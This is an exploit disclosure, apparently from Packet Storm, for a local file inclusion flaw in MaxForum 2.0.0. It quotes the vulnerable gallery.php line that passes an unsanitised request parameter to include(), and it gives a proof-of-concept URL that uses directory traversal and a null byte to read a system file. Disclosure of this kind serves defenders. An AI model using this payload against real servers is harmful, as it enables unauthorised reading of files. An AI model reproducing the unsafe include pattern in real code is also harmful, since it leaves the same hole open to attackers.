MaxForum version 2.0.0 suffers from a local file inclusion vulnerability.
6b6af0124afc2d1945d6ac862846413bbf00fb12e531f0e3f7b907907568a37c############################################
### Exploit Title: MaxForum v2.0.0 Local File Inclusion Vulnerability
### Date: 25/09/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.max4dev.com/demo/ar/
### Software Link: http://sourceforge.net/projects/maxforum/files/2.0.0/Max_v2.0.0.zip/download
### Version : 2.0.0 ( may be old version is affect! i don't check )
### Tested on: Linux/Windows
############################################
# Affected file ( includes/pages/gallery.php ) on line 42 :
include 'gallery/' . $_GET['act'] . '.php';
# P.O.C :
http://127.0.0.1/max2/index.php?act=../../../../../../../boot.ini%00&page=gallery
############################################
# Note :
Must be magic_quotes_gpc = Off
# Greetz to my friendz
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed